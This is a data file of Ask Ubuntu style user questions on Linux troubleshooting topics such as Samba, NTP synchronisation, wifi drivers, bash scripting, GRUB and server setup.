429184	synaptic says samba installed , ca n't launch it	ubuntu & lubuntu 12.04 i installed samba with synaptic package manager , but it does n't show up on any of the lubuntu menus . in ubuntu it does n't show either . dash does n't show it . if i type `` samba '' into terminal i get the program 'samba ' is currently not installed . you can install it by typing : sudo apt-get install samba4 yet synaptic says that samba is installed . i 've logged out , and back in , and restarted the machine , still no sign of samba . i 'm not overlooking something obvious , am i ?
429190	show difference between bmp files	is there a command line tool to show the difference between two bmps in such a way that it would return the difference in their header values in a human readable way ? so , there would be information like difference in width , height , image size , etc .
429192	what is the difference between gtk-window-decorator and compiz-decorator ?	i am using ubuntu 13.10 and have installed ccsm . i found that the default decorator was /usr/bin/gtk-window-decorator . is it correct ? i am using the user configurations ( the home directory of my user and its contents ) left by the previous operating system which is ubuntu 12.04 lts on which i have used gnome for my vnc server . there are articles on the web who believe that the correct one should be /usr/bin/compiz-decorator , so what is the difference between them ? which one should be correct at all ? and if compiz-decorator is correct , why it was replaced ? i have never used ccsm before .
429199	how to create multiple users during installation ?	now these days i am working on a ubuntu customization project . in which i want to add this feature that customizes os can be able to create 2 users automatically during the installation . user can be as : administrator user account named as `` administrator '' . standard user account named as `` net '' . both users have their own passwords . please help me guys . what can i do to perform this task ?
429200	mouse sensitivity is not found in mouse & touchpad settings	i am using rapoo 6610 wireless/bluetooth mouse . it works well but i just can not adjust its sensitivity in system settings . only `` general '' and `` touchpad '' are available in mouse & touchpad . my logitech wireless mouse and trackball are both adjustable . i also have a lenovo bluetooth mouse , and it is also adjustable . it seems that rapoo 6610 is not supported in some ways that other mouses are . does any one has a fix on this ?
429201	system setting changed to system setting ubuntu touch	after removing gnome 3 , my system-settings was changed to system-settings for ubuntu touch . how can i do to change it back to gnome 2 system-settings ?
429203	expanding an encrypted xfs volume	i am working on expanding a currently attached volume to one of my ubuntu amazon aws servers , but i am having some problems . i already created a new volume from a snapshot , then attached the newly created volume to the ec2 instance . i prepare the volume for use by the following commands : sudo vgchange -a y sudo cryptsetup luksopen /dev/mapper/vgdata2-lvdata cryptmnt this volume was originally 600gb and is now 700gb . after mounting the volume with sudo mount /dev/mapper/cryptmnt /mnt/ebs1 i try to expand the volume using sudo xfs_growfs -d /mnt/ebs1/ which results in this output meta-data=/dev/mapper/cryptmnt isize=256 agcount=4 , agsize=39321280 blks = sectsz=512 attr=2 data = bsize=4096 blocks=157285119 , imaxpct=25 = sunit=0 swidth=0 blks naming =version 2 bsize=4096 ascii-ci=0 log =internal bsize=4096 blocks=76799 , version=2 = sectsz=512 sunit=0 blks , lazy-count=1 realtime =none extsz=4096 blocks=0 , rtextents=0 data size unchanged , skipping i have no idea if i 'm doing something wrong or if there are steps that i am missing . running df -h after this results in the following output filesystem size used avail use % mounted on /dev/sda1 7.9g 4.8g 2.7g 65 % / none 827m 124k 827m 1 % /dev none 833m 0 833m 0 % /dev/shm none 833m 52k 833m 1 % /var/run none 833m 0 833m 0 % /var/lock /dev/mapper/cryptmnt 600g 598g 2.3g 100 % /mnt/ebs1 which shows that the volume was not resized .
429204	reinstalling nvidia drivers caused a problem ?	i 've been struggling with ubuntu 12.04 for past 24 hours to setup nvidia properly . 1.i 've checked out additional drivers tool and started downloading recommended package but stopped the operation in the middle and noted down the recommended package and started installing from apt-get . luckily apt-get resumed the partial download . 2.i 've installed nvidia-331 ( recommended ) driver from apt-get . 3.it was installed successfully and got activated automatically . 4.i 've tried unity3d but was not usable so wanted to try direct .run file from nvidia site . 5.un installed previous drivers ( side effect : full fan speed , fixed with grub update ( i guess ) ) and installed .run file . 6.still not satisfactory , so un installed it and decided to reinstall .deb ( all related to nvidia drivers ) files i 've saved from cache using dpkg . 7.but this time i got low resolution mode error before the start of lightdm , somehow i could log in but resolution was way lower than the original . 8.searched for hours , tweaked everything finally came to know that the driver is installed but not activated in additional drivers . so , i 've activated it and rebooted . now everything ( except of course unity3d ) is working fine . now my question is , at first time i installed the nvidia drivers through apt-get online , it was activated without my interference . why is it not so the second time installing from offline .debs ? what 's missing in offline dpkg install ? . what should i do to activate the driver without using jockey ( or jockey-text ) ? system specifications : sony vaio vpceh3aen ubuntu 12.04 lts intel core i5 nvidia geforce with cuda : 410m ram : 4gb thank you ! i 'm however compromised with unity 2d . i 'm posting this question because future visitors may find the answers useful .
429205	`` wifi is disabled by hardware switch '' on asus x75 vd notebook ?	how can i enable wifi on ubuntu 13.10 ? i 'm using an asus x75 vd notebook ( ralink wireless ) and i want to use wifi but i 'm getting a message stating `` wifi is disabled by hardware switch '' . how do i enable it ?
429206	how to remove unity upper panel in my customizes ubuntu os	now these days i am working on a ubuntu customization project . in which i want to remove unity upper bar panel and put this panel at the bottom of the screen . i need manual method to change it . i am unable to install any third party application to do it in chroot environment . help me guys .
429207	network-manager not running ?	i am able to connect to a wifi but as i connect my lan cable for internet it says that network-manager not running and the i am unable to connect to even wifi .
429208	hp 250 h6q77ea ubuntu	i have found a german retailer who is selling this machine at a decent price with ubuntu installed . they do not mention the version . questions will i have any issues ( the keyboard i can live with ) with the fact that the machine has been configured for the german market . does anyone here have any experience with this machine ? the only reviews i have found are from people in germany - looks like it is not on sale anywhere else .
429212	ca n't access apache2 in ubuntu 12.04	i try to start/restart/reload my apache2 in my laptop but the result is fail the errors like this : syntax error on line 1 of /etc/apache2/conf.d/fqdn : invalid command 'exit ' , perhaps misspelled or defined by a module not included in the server configuration action 'start ' failed . the apache error log may have more information . how to solve it ?
429213	how to partition my drive ?	ok i have installed ubuntu 13.10 . i have my files on a hard drive . now i want to put them back on my computer but i am nervous . i have already erased the drive . ( i thought it would just replace windows and leave my partitioned drive ( d ) reserved for files alone . it did n't . so i would like to partition my drive and use one for my files the other for the os . like i had before .
429219	is there any possible issue with changing the boot order often ?	after going through many q & as online , i have managed to install ubuntu 12.04 along with windows 8.1 ( pre-installed ) . though , its not complete , i am happy with it ( after trying it for almost 2days ) . but , i have a question . now , when i boot the pc , windows 8.1 is automatically booted ( no prompts to choose os ) and if i want to boot ubuntu , i need to press f12 ( i am using acer v3-772g ) to change the boot order and thus , i am able boot ubuntu . this approach works perfectly fine for me . but , i want to switch between windows and ubuntu often . my question is , what are the consequences ( or issues ) of changing boot order often . will it corrupt my hdd or any other devices . my pc configuration : 120 ssd : windows 8.1 ( c : \ ) 1tb sata hdd1 : d : \ 1tb sata hdd2 : ubuntu 12.04 lts note : i tried boot-repair several times with no luck ( i am getting grub-rescue > ) . so , i decided not to use that .
429221	how can i change this script in order to delete directories as well ?	find /folder/* . * -mtime +14 -exec rm { } \ ; i tried rm -r and with -r argument , but without any result .
429225	can i learn systemd on an upstart system ?	i want to leave my current system running with upstart ( if it ai n't broke ... ) . however , i would also like to dip my toe into systemd ( in anticipation of the changeover ) . is there any way to get systemd to run in some minimal fashion on an upstart system , so that i could easily do some or all of the following : try manually starting and stopping some daemons with systemd rather than upstart try setup systemd to start some daemons automatically ( upstart > systemd > mydaemon ) inspect systemd configuration do something fancy that only systemd can do ( ? ) use systemd gui tools ( if any )
429228	ubuntu update manager finishes checking for updates but not prompting to do pending updates/upgrade	i 'm trying to upgrade ubuntu from 13.04 to 13.10 . already i 've done a partial update for current 13.04 system before upgrading it to ubuntu 13.10 . then , i tried to upgrade it to 13.10 . meanwhile internet connection went off and it just went to a black screen . i had to do force shutdown and restart the system . now , from the dash , through software updater , when i checked for updates , it just keeps on checking and after a long time , it shows checking has been finished . but that window keeps on showing and no upgrade window is being shown at all . i did sudo apt-get update . then also , no upgrade prompt is being shown to upgrade to 13.10 . what to do now ?
429229	how to check in a bash script if passed argument is file or directory ?	i have to write a simple bash script in ubuntu which would allow me to pass it some arguments and i want to check if these arguments which can contain spaces are files or directories . how can i do this ?
429230	dsl connection in wicd	how can i configure dsl connection in wicd any idea and if not use this then what should i use .
429233	memory error when attempting upgrade	i get a error when ubuntu tries to update . the error says i do n't have enough memory to update but my harddrive is full of space .
429239	how to upload and download file in hadoop ?	i want to upload and download file in hadoop . and want to store file in server or multi-node cluster .
429240	what upgrade options for non-pae machine ?	the last time i upgraded this machine it failed because i have a non-pae processor . i was forced to reinstall the last , old version of xubuntu . now i fear i 'm stuck with a discontinued distribution . i do n't know whether i can upgrade , whether i should and how i should . e.g . can i happily carry on with this old distribution forever ? i need to install skype . it should be okay , should n't it ? but for how long ? is this the end of the relationship between me and ubuntu ? or is there a way i can carry on using it with my old processor ? this is what i 've got : linux version 3.2.0-58-generic ( buildd @ akateko ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) vendor_id : genuineintel cpu family : 6 model : 9 model name : intel ( r ) pentium ( r ) m processor 1200mhz stepping : 5 microcode : 0x7 cpu mhz : 600.000 cache size : 1024 kb fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr mce cx8 apic mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 tm pbe up bts est tm2 bogomips : 1196.12 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical , 32 bits virtual
429241	identify ssd cache drive	i 've just bought a crunchy piece of asus n550lf laptop . the supplier claims that it comes with a secondary 16gb ssd drive , however it 's neither listed in bios , nor can be seen in gparted as a separate disk . it has a toshiba mq01abd100 hdd that does n't contain such an ssd cache . i 've asked the supplier why is n't it visible and they said : the cache is integrated on the mainboard therefore is n't visible either in bios or in the os . the operating system automatically copies the startup files of programs to the cache , so that they can be run faster , so it can not be accessed even for this very reason . sounds like bs , but i might be wrong.. i also read here , that ahci must be enabled in the bios in order to see this ssd as a separate drive . in this bios however , at the mentioned dropdown i only have the option ahci , so i guess it 's enabled . some people claim ( here and here that the laptop is advertised with this ssd option but actually is n't present . so my question is , how can i figure out with ubuntu whether this ssd unit is actually present in the laptop or not ?
429242	commercial support for ubuntu server os	as we all know that canonical provides commercial support for ubuntu server os . i am not able to find the pricing structure for the same . i have tried to reach them through their site here , but i have not got any response . can anyone please put some lights on this , or share rough pricing structure for commercial support from them .
429243	change mouse button configuration	i want to change my two extra mouse button configurations , but its so cumbersome to do it by xev , xbind . is there a gui application to do this ? one like btnx , btnx shows dead for saucy salamander .
429245	i ca n't turn on wifi on fujitsu sh530	i had a problem with my wifi on fujitsu sh530 laptop , here is some info maxwell @ maxwell-lifebook-sh530 : ~ $ rfkill list wlan 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : yes hard blocked : no as you can see is either my wireless lan driver install wrongly or soft block is blocking i try to go system setting - > network - > wireless - > click turn on but it fail to turn on it will just go back to off after you click on . if i use additional driver in the system settings , it wo n't able to locate my wifi do you had any info i should i reinstall my wireless lan driver correctly ? thank you best regards , maxwell
429247	how to find and list all the symbolic links created for a particular file ?	i had created many symbolic links on various paths for a particular file or a directory . i want the whole list of created symbolic links paths ( location ) . example : i created symbolic links for ~/pictures directory on many directories . how do i list all the symlinks to that ~/pictures directory ? is that possible ? if yes , then how ?
429250	i can not change between windows vm and linux host	when i open my virtual windows machine i can not leave the screen and go to my linux system . i can not minimize my wm window . how can i fix this problem ?
429255	xterm xt error : ca n't open display : % s on ubuntu 13.04 host with oracle linux 6 as guest	i 've set up my environment as specified in the question.but when i do xterm from oracle linux ( guest ) after exporting display to 192.168.56.1 which happens to be my vboxnet0 ip of ubuntu ( host ) , i get the error as specified already.also x11forwarding is set to 'yes ' in ol6 . any help ?
429257	ubuntu 13.10 with bugzilla 4.4.2 problem with .htaccess	i 've succesfully installed ubuntu 13.10 lamp server and then succesfully installed bugzilla 4.4.2 according to online guidelines . now , when i try to access bugzilla page , i get internal server error . apache 's error log shows : [ client 127.0.0.1:34039 ] /var/www/bugzilla/.htaccess : options not allowed here what is wrong ?
429264	error : invalid arch independent elf magic . grub rescue	info can anybody see what the problem is ? to partition a new laptop which had windows 8 . think i do not have a partition for the boot but not sure . used boot recovery cd and boot repair . could it be in legcay mode and the other in uefi ? help , the easiest possible way out .
429269	rip a dvd title with ifo and bup files from the command line	like the title says , i would like to rip a dvd title with ifo and bup files from the command line . i have tried several programs with varying results . using dvdbackup : dvdbackup -i imagefile.img -o /home/username/tmp -t 1 ... but this way there are no ifo or bup files . so i continued to re-author result using dvdauthor : dvdauthor -t -o /home/username/tmp/dvd *.vob ... but the re-authored files do not include some important info , like the subtitle language names . using vobcopy : vobcopy -n 1 -i imagefile.img -o /home/username/tmp ... no ifo or bup files . using mplayer : mplayer dvd : //1 -dvd-device imagefile.img -title 1 -dumpstream -dumpfile title1.vob ... no ifo or bup files . using cpvts : cpvts -d /media/dvd -t 1 /home/username/tmp cpvts has some problems . it rips the whole titleset , not the individual title . this takes a lot of space when ripping several titles separately . also it needs some dependecies , which are deprecated .
429276	count length of letter string	i have a file that look like that ( dna sequence in fasta format ) : > sequence_name1 atcgtgatnnnnnnnnagtcgatcggattct > sequence_name2 nnnnatgtnnatgtccnnnnnnn i want to count the length of gaps , that is the length of n strings . for instance , in the first sequence the length is 8 . in the second sequence , i have a gap of 4 , another of 2 and another of 7 . it would be great if i could obtain a table with gap length density that is a table stating that i have x gaps that have a length of 1 , x that have a length of 2 , and so on : 1 x 2 x 3 x ... any idea how to do that ? thank you ! mu
429278	tomcat not shuting down on server	when i shutdown tomcat on server it show following error using catalina_base : /usr/local/tomcat7/apache-tomcat-7.0.52 using catalina_home : /usr/local/tomcat7/apache-tomcat-7.0.52 using catalina_tmpdir : /usr/local/tomcat7/apache-tomcat-7.0.52/temp using jre_home : /usr/local/java/jre* using classpath : /usr/local/tomcat7/apache-tomcat-7.0.52/bin/bootstrap.jar : /usr/local/tomcat7/apache-tomcat-7.0.52/bin/tomcat-juli.jar ./catalina.sh : 1 : eval : /usr/local/java/jre*/bin/java : not found and its also not update database please help .
429279	how to change default in ubuntu 12.04 lts	now these days i am working on a project in which i have to customize the ubuntu as per the requirement . i am using ubuntu 12.04 lts i386 architecture edition for the customization . i want to change the defaults for my customize os like : i want to change the default theme . i want to change the default icon set unity top bar color and position . lightdm directory is not present in /usr/lib to change the defaults , so tell me from where i can change it ?
429280	how do i iterate the arguments in a bash script ?	is there any method to iterate the passed arguments in a bash script ? this answer from my question shows me how to use each argument , but i want to iterate them because the number of arguments is variable . i tried something like : for i in { 1..10 } do if [ [ -f `` $ ( $ i ) '' ] ] then echo `` $ ( $ i ) is a file '' elif [ [ -d `` $ ( $ i ) '' ] ] then echo `` $ ( $ i ) is a directory '' else echo `` $ ( $ i ) is not a file or directory '' fi done but it give me errors . i tried also to use without success $ $ i instead of $ ( $ i ) ...
429283	n2n-edge vpn and centos server	i have one big appeal . i 'm newguide in configuring iptables etc ... i have at home freepbx server ( on centos 6.5 ) where is installed n2n vpn as service i will name it [ s ] ( adress on home lan 192.168.0.102 and on n2n vpn 192.168.5.110 ) and at work i have installed xubuntu . we will name it [ x ] i want to be [ x ] connected to internet over [ s ] to internet and back . for setup i used this manual here and on [ x ] i run ssh -d 8000 root @ 192.168.5.110 , connected ok . in firefox i set proxy on 127.0.0.1 and port 8000 , but firefox returning that server is not responding ... very thanks for your answers : )
429289	how do i use boot repairs manager without internet connection ?	i 'm unable to repair ubuntu 12.04 boot with boot repairs manager as it asks for internet connection . how do i use boot repairs manager without internet connection ?
429290	how to prevent `` switch user account '' in ubuntu 12.04 from logging me out ?	the title of the feature , `` switch user account '' , suggests that the current user 's information is safe and can be restored . however , when i log back in to my account after a `` switch user account '' , my session starts fresh . how can i keep my original session running when the user is switched ? this has been asked for ubuntu 13.04 but no answer was provided there . i am on ubuntu 12.04 . update : please note that i am not looking for a better way to `` switch user '' . i just want that when i accidentally do `` switch user '' from the menu , i am not logged out .
429292	could not open connection to host ( ubuntu server ) on port 23 , 5432 , 3306	i have recently installed few packages for telnet , mysql and postgresql . i can access all these service locally on the ubuntu server but somehow i am not able to access these services from other machines . below are the active internet connections using : sudo netstat -tulpn tcp 0 0 0.0.0.0:23 0.0.0.0 : * listen 18776/inetd tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen 19451/mysqld tcp 0 0 0.0.0.0:5432 0.0.0.0 : * listen 8453/postgres i am not able to figure out what i am missing . i am almost sure that i have configured these packages correctly to allow outside world connections . when i am trying telnet from windows , i got `` could not open connection to the host , on port 23 : connect failed '' i doubt , my router might have blocked these connections but i do n't know how to troubleshoot or unblock these connections . please suggest , many thanks !
429298	how to restrict the websites for the hotspot users in ubuntu ?	i have created a wifi hotspot in my ubuntu laptop following this instructions for my brother to use in his android . for some obvious reason i want to restrict the websites he visit . now how do i restrict websites for him ? more over how can i imply that only specified websites can be visited from that device ?
429301	how to i make ubuntu to recognize dell poweredge r420 raid 1 made of ssd ?	i have a dell poweredge r420 configured with 2 ssd in raid 1 and i installed ubuntu on it . so far so , good but it seems that the os has no idea about the fact that it is running on a raid nor that is it running on ssd . i was more concerned about enabling trim but that 's not working because os does n't know it 's a ssd .
429303	save screenshot does not not appear when i press the print screen button	`` save screenshot '' does not not appear when i press the print screen button . what should i do in order to see `` save screenshot '' ?
429304	where is the gls include path and lib in ubuntu 12.04 ?	i am new to installing libraries in c++ , i need to compile a code that uses gsl library , i used synaptic to install this library , but i do n't understand where the files are . in the makefile of the code that i need to use i need to specify the include path and lib path of gsl . can anyone give me a hint ?
429305	can not boot ubuntu	i made a boot-repair from terminal , and set the pre installed windows 8 to sda2 , and afterwards when i start ubuntu the screen looked funny , and then i used recovery from the start , and now every time i boot ubuntu it 's comes whit shell where i can type in user name and password , and my problem is what to type in at the shell root so i can use ubuntu again , i also tried an usb stick whit ubuntu but still can come to ubuntu . thanks .
429306	ntpdate : no server suitable for synchronization found	my clock is off , so i would like to synchronize it using ntpdate . i tried several different ntp servers , but for some reason i always get the following error message : $ sudo ntpdate ntp.ubuntu.com 4 mar 12:27:35 ntpdate [ 1258 ] : no server suitable for synchronization found $ sudo ntpdate pool.ntp.org 4 mar 12:27:50 ntpdate [ 1267 ] : no server suitable for synchronization found $ sudo ntpdate de.pool.ntp.org 4 mar 12:28:01 ntpdate [ 1273 ] : no server suitable for synchronization found $ sudo ntpdate us.pool.ntp.org 4 mar 12:28:12 ntpdate [ 1276 ] : no server suitable for synchronization found related questions i have looked through related questions , but none solve my problem : unable to synchronize time using ntp - this guy gets a different error than i ; his problem was a conflict with the ntpd daemon . i do not have the ntp package ( which includes the ntpd daemon ) installed at all . how to force a clock update using ntp ? - this guy 's problem is that the ntpdate command would n't properly work at boot time when he put it into his /etc/rc.local , and the problem was similarly a conflict with the ntpd daemon that was running . neither am i trying to run ntpdate at boot time , nor ( again ) do i have the ntpd daemon installed . unable to sync time using `ntpdate` , error : `` no server suitable for synchronization found '' - this is my error alright , but the accepted answer is basically `` use ntpd instead of ntpdate '' . aaarggh ... things i have tried i installed the ntp package ... and tried using the ntpd daemon instead of the ntpdate utility . it wo n't sync my time either ; the daemon starts fine , but my clock remains off . i even tried using the exact /etc/ntp.conf from the accepted answer in the latter post , and restarting the daemon . no go . anyway , i do n't want to use the daemon . i am perfectly aware that ntpdate is considered `` deprecated '' , and it is advised to use ntpd -q instead . also see here : ntpd vs ntpdate : pros and cons but since ntpd does n't work for me either , the problem lies elsewhere . and i find that i would prefer not having to install any extra packages just for synchronizing the clock . ntpdate comes pre-installed with ubuntu , and it should work just fine . so i uninstalled the ntp package again . maybe port 123 is blocked ? from this post : '' no server suitable for synchronization found '' error when trying to run `ntpdate` ... i got the idea that port 123 may be blocked from my computer / network at my work place . indeed , $ sudo nmap -p123 -su -p0 localhost ... port state service 123/udp closed ntp ... $ sudo ufw allow 123/udp rules updated rules updated ( v6 ) $ sudo nmap -p123 -su -p0 localhost ... port state service 123/udp open ntp ... but still : $ sudo ntpdate ntp.ubuntu.com 4 mar 13:06:16 ntpdate [ 4361 ] : no server suitable for synchronization found even with the -u option , which tells ntpdate to use an unprivileged port for syncing ( instead of port 123 ) which is certainly not blocked from my work place : $ sudo ntpdate -u ntp.ubuntu.com 4 mar 13:06:28 ntpdate [ 4427 ] : no server suitable for synchronization found maybe the strata are too high ? lastly , from this post over at serverfault : ntpdate -d server dropped strata too high ... i thought that maybe the strata from the ntp servers are too high . they are n't , though . let 's see a little more debugging info : $ sudo ntpdate -dv ntp.ubuntu.com 4 mar 13:12:24 ntpdate [ 4523 ] : ntpdate 4.2.6p5 @ 1.2349-o wed oct 9 19:08:07 utc 2013 ( 1 ) looking for host ntp.ubuntu.com and service ntp host found : golem.canonical.com transmit ( 91.189.89.199 ) transmit ( 91.189.94.4 ) transmit ( 91.189.89.199 ) transmit ( 91.189.94.4 ) transmit ( 91.189.89.199 ) transmit ( 91.189.94.4 ) transmit ( 91.189.89.199 ) transmit ( 91.189.94.4 ) transmit ( 91.189.89.199 ) transmit ( 91.189.94.4 ) 91.189.89.199 : server dropped : no data 91.189.94.4 : server dropped : no data server 91.189.89.199 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 91.189.89.199 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 mon , jan 1 1900 1:00:00.000 originate timestamp : 00000000.00000000 mon , jan 1 1900 1:00:00.000 transmit timestamp : d6c041ae.e6166441 tue , mar 4 2014 13:12:30.898 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 91.189.94.4 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 91.189.94.4 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 mon , jan 1 1900 1:00:00.000 originate timestamp : 00000000.00000000 mon , jan 1 1900 1:00:00.000 transmit timestamp : d6c041af.1948fc50 tue , mar 4 2014 13:12:31.098 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 4 mar 13:12:33 ntpdate [ 4523 ] : no server suitable for synchronization found pfeeewww ... this was a long one , sorry for that . i 'm stumped . any clues ? update : additional infos no matter whether an ntp server hostname figures in /etc/ntp.conf , and no matter whether the ntpd service is running or not , whenever i run sudo ntpdate -u hostname , i get no server suitable for synchronization found . same thing when the ntpd service is not running and i omit the -u option . when the ntpd service is running and i omit the -u option , i instead get the ntp socket is in use , exiting . also : $ timedatectl status local time : wed 2014-03-05 13:11:54 cet universal time : wed 2014-03-05 12:11:54 utc timezone : europe/berlin ( cet , +0100 ) ntp enabled : yes ntp synchronized : yes rtc in local tz : no dst active : no last dst change : dst ended at sun 2013-10-27 02:59:59 cest sun 2013-10-27 02:00:00 cet next dst change : dst begins ( the clock jumps one hour forward ) at sun 2014-03-30 01:59:59 cet sun 2014-03-30 03:00:00 cest but the utc time is not correct here . right now utc time is 11:11 , not 12:11 . and : $ sudo hwclock -- show wed 05 mar 2014 01:11:56 pm cet -0.625627 seconds
429307	installing chrome os desktop environment on my 32bit computer	this question says that it 's possible to install chrome os as a desktop environment to ubuntu but it 's only available for 64bit pcs . would it work on my 32bit pc ? i just want to try it . it does n't need to be perfect . what are the limitations of such an installation ?
429309	change home folder background on ubuntu 13.10	i 'm using ubuntu 13.10 . i want to change the background of my home folder with my own photos ... how ? in contrast to the ubuntu 10.04 which have backgrounds and emblems , ubuntu 13.10 nothing at all . i want it to look like this for example :
429311	getting an error while starting ubuntu : mismatch in adjusted_mode.flags	i 'm using ubuntu 13.10 and dell latitude . while ubuntu is loading i am getting the following error twice : `* error * mismatch in adjusted_mode.flags ( expected 2 , found 0 ) it is not the complete error message , i ca n't see its first part because it displayed only for a very short while . do you have any idea how can i fix it ? thanks in advance .
429312	ip address has incomplete mac	i have a case of clients on my lan losing its mac address . this seems to happen randomly to clients even though they had both an ip address and mac addresses ( when `` arp '' ) during the initial boot up . after the mac address is lost ( incomplete ) , i am unable to ping or ssh to that client ; nor does a reboot work . anyone have ideas ? description of lan ( closed system , not connected to the internet ) . - ~100 clients all set to static ip address through /etc/network/interfaces - ~1 core switch - ~16 access switches ( daisy chained ) - linksys router
429313	caldav resources readonly in akonadi	i have just ( re ) installed and upgraded my server to egroupware from opensuse build service . now i want to sync all my devices with the egw installation to manage contacts , tasks and appointments . the state so far is that read-write sync to/from thunderbird/lightning and my android devices works all right . no i want to embed akonadi as i am using kdepim/kontact on my main machine . the addressbook works too , as far as i can see . the problem arises in case of tasks/appointments : the calendars are marked by default as read-only . so the sync itself seems to work ( i can see the things ) but there is still some problem as not writable . i googled a bit an found two bug reports : 303861 and 273949 . i can confirm the same problem as in the first bug report that the acls seems to be empty in the akonadiconsole and changing the accessrights to a ( from the empty string ) seems allows me to write to the calendar . however after a sync ( ? ) the string gets resetted to the empty string and no writing is possible anymore . according to the bug report this issue was fixed in kde 4.9.3 . here i am running ubuntu saucy with kde 4.11.5 . can you give me any hints ?
429316	dell vostro 2520 wireless not detecting in ubuntu 12.10	i have tried all solutions listed on forum but when i give command modprob wl it gives fatal : module wl not found please help i need to start wireless
429322	ubuntu 13.10 not finding secured wireless network	i am having a network issue with my new install of 13.10 . when i am on my home network , i can find and connect to the internet with no problem . however , in the university i can not find the network at all . i know it is within range because i never had a problem connecting from windows , but can not find anything anywhere to help . the university 's connection is secured with 802.1x peap , which i know causes connection problems for many , but ca n't find anyone else with this issue ! does anyone have any idea how to sort ? my wireless card is ar9285 .
429325	how do i configure ftp accounts for vsftpd ?	i have a new 12.04 desktop installation . this pc is also my server ( lamp + postgres ) . i have just one user for the os . there are 3 pcs in my lan . i have installed vsftp and that 's it . what i want to ... i want to create 10 ftp accounts for different users and each one should have write permissions to a sub-folder in /var/www . please note that there is only one user account for the os . there are many posts on working with ftp but nothing seem to address this issue of many ftp accounts for a computer that only has a single os user defined . this is more like what we do with cpanel . i just create different ftp accounts for different users but they 're not server users . at least that 's what i figured . any guidelines on this would be really appreciated .
429326	why asus with ubuntu is so slow ?	i had a previous laptop asus k52j ( 8 gb ram , i5 intel core cpu ) and used it for developing . now i 've just bought an asus n750j ( 16 gb ram , intel® core™ i7-4700hq cpu @ 2.40ghz × 8 cpu ) and installed ubuntu on it . honestly i 'm not satisfied at all with how it works . for instance , a maven project where some sql queries are run when packaging , is slower on this new machine than it was on previous machine where i had windows installed . it mostly run slower after using it for 1-2 days with two workspaces . if i do a fresh restart it runs much better but it becomes slower `` in time '' . even if i set cpu to performance mode , the things are not changed too much . does anybode has any idea of what can be the cause of this slow performance ? i really do n't want to go back to windows but i ca n't believe this situation ... i can confirm that there are no hidden/background processes using a lot of cpu or memory . update : i am a beginner using linux so i might not know exactly where to look into . any help would be appreciated . in /var/log/syslog i see a lot of warnings like these , not sure if this influence the slow performance : 4 10:49:19 cristi-laptop networkmanager [ 930 ] : nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted some outputs : cristi @ cristi-laptop : ~ $ uname -a linux cristi-laptop 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:53:31 utc 2014 i686 i686 i686 gnu/linux cristi @ cristi-laptop : ~ $ lspci | grep -i network 03:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) cristi @ cristi-laptop : ~ $ this is an entire syslog after a fresh restart : http : //paste.ubuntu.com/7033170/
429327	two different versions in root and in public	i am starting out with ubuntu so forgive me for the beginner 's question . i tried to look for it here and i found nothing ... i installed anaconda for all the python packages and i had some of them installed before ( but under different versions ) . when i run `` ipython notebook '' in public i get an old version . when i run the same in su mode i get the new version ( that i would like to use ! ) how can i get to this version in public as well ?
429328	how to install ubuntu 12.04 lts ?	when i was starting my computer i found a problem and due to which the computer was not starting i.e . it was showing boot problem then i thought of installing ubuntu . the problem arises that i only have about 800 mb and it is needing 4.4 gb . the question is that is there any way by which i can delete some items and then install ubuntu ? please help it is very urgent .
429332	how do i upgrade from ubuntu 10.04 lts to the latest stable release ?	i am using ubuntu 10.04 lts . i want to upgrade to the latest version of ubuntu . is it possible ? i read on this forum that i have to do a serial upgrading . if that is the case , will all my software installed previously be safe or do i have to reinstall them again ? what happens to my data after upgrading ?
429337	install ubuntu along windows 8 with uefi ( ca n't get to installation screen )	i am trying to install ubuntu alongside with windows 8 for three days now . i have a simple notebook with no cd/dvd drive , so i am using a usb stick for it and i used the recommended usb boot creator tool : http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ . the tool seems to work fine as windows recognize the usb stick as a ubuntu install . and i do n't have a broken image ( i checked the md5 hash ) . i was able to boot the usb stick in efi mode ( i saw in this tutorial how to ) , but after a while in the ubuntu typical loading screen i get to a terminal text screen with some `` kernel panic '' stuff and saying that `` going back to text mode '' or something like that . the problem is that after that nothing happens ( need to force shutdown ) . i tried to disable uefi and then boot the computer with the usb stick normally , but then after the typical loading screen i get a white screen with nothing and no options ( need to force shutdown to leave , also ) . at last , i figured maybe was a distribution problem , so i tried linux mint 16 ( which is based on ubuntu , but anyway ) and also opensuse . none of them worked . mint x server crashed ( at least i got to a terminal , but that was not what i wanted ) . opensuse only got me more kernel panic text and i also needed to force shutdown . i am with this notebook for a few months now and i always wanted to install linux in it , but was delay because of all the complains i read about this uefi stuff . any suggestion ? thanks in advance . edit : this question is not answered in that post . like i said , i ca n't even get to the installation screen . edit 2 : i have tried the ubuntu 12.04.4 in both legacy mode and efi mode and always i get to the white screen ( after ubuntu loading ) without any further option ( except forced shutdown ) . i also tried the 13.10 version , but the result was the same .
429341	display configuration messed up	i have a laptop and an external monitor . i can set the correct resolution for both of them , however , after some time configuration messes up : resolutions get swapped and display mirroring turns on . what can i do to stop this behavior ?
